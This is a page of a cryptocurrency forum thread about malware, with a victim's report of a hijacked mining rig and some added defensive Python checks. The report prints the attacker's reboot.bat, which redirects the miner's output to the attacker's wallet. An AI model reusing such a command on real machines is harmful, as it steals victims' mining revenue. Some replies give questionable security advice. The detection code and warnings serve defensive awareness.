
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 40. (Read 689408 times)

sr. member
Activity: 700
Merit: 275
That's dangerous. Aren't there any precautions by forum devs against such cyber attacks? It is easy for anyone to open ANN threads or any topic, and that's freedom, completely agreed. But what if shit is opened up by attackers every day and we get victims every day? This is not healthy for the forum, really.
newbie
Activity: 29
Merit: 0
Not all heroes wear capes.

Thank you very much.
member
Activity: 84
Merit: 11
Thanks a lot, great educational and eye opening post.
full member
Activity: 307
Merit: 119
Could you please post the coin's name and maybe others that you may have found?
Yes, it is very helpful for the advancement of investing in new coins.
full member
Activity: 243
Merit: 100
Thanks for sharing, wouldn't want to be that guy losing it all.
sr. member
Activity: 305
Merit: 250
I am also getting some personal messages from newbies asking for Skype and Gmail IDs for better earnings, and more spam posts nowadays; even some links I checked are completely not secured.

Just avoiding clicking on any suspicious URLs or links/downloads should be enough.
sr. member
Activity: 910
Merit: 252
I am also getting some personal messages from newbies asking for Skype and Gmail IDs for better earnings, and more spam posts nowadays; even some links I checked are completely not secured.
full member
Activity: 130
Merit: 100
thecryptoconsultant.com
Hi Security aware people who commented in here

Do you know if all the TOP20 blockchains have been tested just like the bitcoin code has been, or is there a risk that we discover that a network like maidsafecoin or Waves is a scam?

Thanks for commenting your thoughts.

Victor
newbie
Activity: 42
Merit: 0
There is an easy way to avoid this. Don't install every crypto coin that comes out and try their software if you don't fully understand their code or it's not fully evaluated. Also don't run it on machines or networks where you have finances. Try to VMware/VirtualBox it before you add it to your massive list of altcoins you invest in.
full member
Activity: 588
Merit: 100
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread helps me be more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.

Basically, the user's caution is necessary to keep computer software safe.
full member
Activity: 588
Merit: 100
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Antivirus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting your computer regularly isn't a good habit at all. You are just shortening the life span of your personal computer, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there who can't help their fingers but click suspicious links: never believe people who are posting some links.
Oh, I see more optional solutions to help with a lot of the problems raised in this thread, but you're right, it's not really good to format your PC immediately just to give up solving the malware infection while the OS is still running. For the lifespan of your computer you must download the most reliable PC security that would take away all the worries you have, and I can recommend the latest version of ESET NOD32 antivirus, now available if you search on their site online; even the trial version works totally fine.
I want to ask, what are the characteristics of a secure application to install? Because I often install the applications I need from the internet...
newbie
Activity: 28
Merit: 0
Never Use a Hacked Wallet

Changing passwords is not a solution, because it is possible that all the private keys in your hacked wallet are already known to the hacker, and private keys cannot be replaced.

Leave the wallet that has been hacked. Use the new wallet.
member
Activity: 245
Merit: 10
this one is a scam .. gonna add this
sr. member
Activity: 616
Merit: 250
I'm adding this to the list of possible scams:

Of which there are 2 lines
Which I have underlined



Are you new to trading cryptocurrencies? Do you want to learn how to earn your slice in crypto riches?
Read our guides written by the Crypto Traders Room community, for FREE! And get your foot wet..

Guide on trading cryptocurrencies in general:

https://docs.google.com/document/d/1YgB5Jf1jbm8OzT9372ZqCkBnTQui6gkx0SICKq61Pv0/edit#

Guide on trading on margin (with leverage) on Poloniex exchange:

https://docs.google.com/document/d/1ex37eOVMCWJRHXLN6KLQcrMPsUbQw15jAFrLeO1aSUk/edit?usp=sharing

Join our chat room by following this link:
https://discord.gg/9h4kjAE

- be sure to check out Discord app on iOS or android
- preferred to use discord desktop application for PC use rather than browser




member
Activity: 97
Merit: 10
This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.
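A check for the spoofed-extension case described in the post above, comparing a file's name with its leading bytes. This is an added example, not part of the original post; the file names and byte strings in it are constructed samples.

```python
import os

# Magic bytes show what a file really is, whatever its name says.
PE_MAGIC = b"MZ"  # Windows executables (.exe, .scr, .dll) start with these bytes
IMAGE_MAGIC = {
    ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8",
}
# Extensions Windows runs on double-click.
RUNNABLE_EXT = {".exe", ".scr", ".bat", ".cmd", ".com", ".pif", ".vbs", ".js"}


def check_download(name, head):
    """Return findings for a downloaded file's name and its first bytes."""
    findings = []
    stem, ext = os.path.splitext(name.lower().strip())
    inner_ext = os.path.splitext(stem)[1]

    # "photo.jpg.exe": Explorer hides the final extension by default.
    if ext in RUNNABLE_EXT and inner_ext in IMAGE_MAGIC:
        findings.append(f"double extension: {inner_ext}{ext}")

    # Executable content under a name that does not look runnable.
    if head.startswith(PE_MAGIC) and ext not in RUNNABLE_EXT:
        findings.append(f"Windows executable content behind {ext or 'no'} extension")

    expected = IMAGE_MAGIC.get(ext)
    if expected and not head.startswith(expected):
        findings.append(f"content does not match {ext} signature")
    return findings


def check_file(path):
    """Check a file on disk, reading only its first 16 bytes."""
    with open(path, "rb") as fh:
        return check_download(os.path.basename(path), fh.read(16))


if __name__ == "__main__":
    # Constructed samples: (file name, leading bytes).
    samples = [
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
        ("roadmap.jpg", b"MZ\x90\x00\x03\x00\x00\x00"),
        ("whitepaper.jpg.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    ]
    for name, head in samples:
        print(name, check_download(name, head) or "ok")
```

A clean result only means the name and header agree; it says nothing about whether the content is safe to open.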
sr. member
Activity: 305
Merit: 250
Does the malware affect desktop/laptop computers only? Does it affect iPhone/iOS users?
newbie
Activity: 30
Merit: 0
My ethmining is being hijacked.

Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover.  In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner? I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP; will a VPN make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety?  As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time: 00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
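Detection logic for the pattern in the post above: a file pushed over the miner's remote management port followed by a restart, and a .bat whose pool or wallet is not the owner's. This is an added example, not part of the original post or of the miner software; the sample lines come from the post, while `OWNER_WALLET_PLACEHOLDER` and the 30-second window are assumptions.

```python
import re
from datetime import timedelta

LINE = re.compile(r"^(\d\d):(\d\d):(\d\d):(\d{3})\s+\w+\s+(.*)$")
FILE_EVENT = re.compile(r"Remote management: file (\S+) was (uploaded|downloaded)")
ARG = re.compile(r"-(epool|ewal|dpool|dwal)\s+(\S+)")

def parse(log_text):
    """Yield (time of day, message) for each well-formed log line."""
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            h, mi, s, ms = map(int, m.groups()[:4])
            yield timedelta(hours=h, minutes=mi, seconds=s, milliseconds=ms), m.group(5)

def remote_alerts(log_text, window=timedelta(seconds=30)):
    """Report remote file transfers and a restart soon after an upload (same day only)."""
    alerts, upload = [], None
    for ts, msg in parse(log_text):
        ev = FILE_EVENT.search(msg)
        if ev:
            alerts.append(f"{ev.group(1)} {ev.group(2)} via remote management")
            if ev.group(2) == "uploaded":
                upload = (ts, ev.group(1))
        elif "Remote management required restart" in msg and upload and ts - upload[0] <= window:
            alerts.append(f"restart {(ts - upload[0]).total_seconds():.1f}s after {upload[1]} upload")
    return alerts

def foreign_settings(bat_text, wallets, pool_suffixes):
    """Return (option, value) pairs not matching the owner's wallets or pool domains (a tuple)."""
    found = []
    for opt, value in ARG.findall(bat_text):
        host = value.split("://")[-1].split(":")[0]
        ok = value in wallets if opt.endswith("wal") else host.endswith(pool_suffixes)
        if not ok:
            found.append((opt, value))
    return found

# Sample input from the post (bat shortened); OWNER_WALLET_PLACEHOLDER is hypothetical.
LOG = """
02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:13:363   689c   Remote management required restart
"""
BAT = ("EthDcrMiner64.exe -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M "
       "-dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M")
if __name__ == "__main__":
    print(remote_alerts(LOG))
    print(foreign_settings(BAT, {"OWNER_WALLET_PLACEHOLDER"}, (".miningpoolhub.com",)))
```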
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread helps me be more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi-professional hackers.

You know it.. and so did "Satoshi"..

He/they are cryptoFIAT banking on it. (pun intended)
sr. member
Activity: 313
Merit: 258
I recommend using Linux for any PC running a full node; Linux is much more secure than Windows.

The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.

Then create a separate account for your regular usage. That way, in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node. This way your bitcoins, litecoins, dash, etc. will be safe.

For extra security Trezor and Ledger Nano S are the best.

Both are great hardware wallets, and both have features that are missing on the other wallet: Trezor has support for a password manager, and Ledger has support for litecoins.

I recommend having both; for traveling by plane the Ledger has the advantage that it looks like a USB stick.
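A check of the account separation described in the post above: wallet.dat readable only by its owner, and not owned by the everyday account. This is an added example, not part of the original post; the `everyday_uid` parameter and the throwaway wallet file built in `demo()` are assumptions made for illustration.

```python
import os
import stat
import tempfile


def audit_wallet(path, everyday_uid):
    """Return problems with a wallet file's owner and mode.

    everyday_uid is the uid of the regular browsing account, which should
    neither own the wallet nor reach it through group/other permissions.
    """
    problems = []
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        problems.append(f"file mode {mode:04o} gives group/other access, want 0600")
    if st.st_uid == everyday_uid:
        problems.append("file is owned by the everyday account")

    # A directory that others can write lets them swap the wallet file itself.
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    pmode = stat.S_IMODE(parent.st_mode)
    if pmode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"directory mode {pmode:04o} is group/other writable")
    if parent.st_uid == everyday_uid:
        problems.append("directory is owned by the everyday account")
    return problems


def demo():
    """Build a throwaway wallet.dat (constructed, empty) and audit it twice."""
    with tempfile.TemporaryDirectory() as d:
        wallet = os.path.join(d, "wallet.dat")
        open(wallet, "wb").close()
        other_uid = os.getuid() + 1          # stands in for the everyday account
        os.chmod(wallet, 0o644)              # common default: readable by everyone
        before = audit_wallet(wallet, other_uid)
        os.chmod(wallet, 0o600)              # owner read/write only
        after = audit_wallet(wallet, other_uid)
    return before, after


if __name__ == "__main__":
    for label, result in zip(("0644", "0600"), demo()):
        print(label, result or "ok")
```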
sr. member
Activity: 686
Merit: 261
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread helps me be more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi-professional hackers.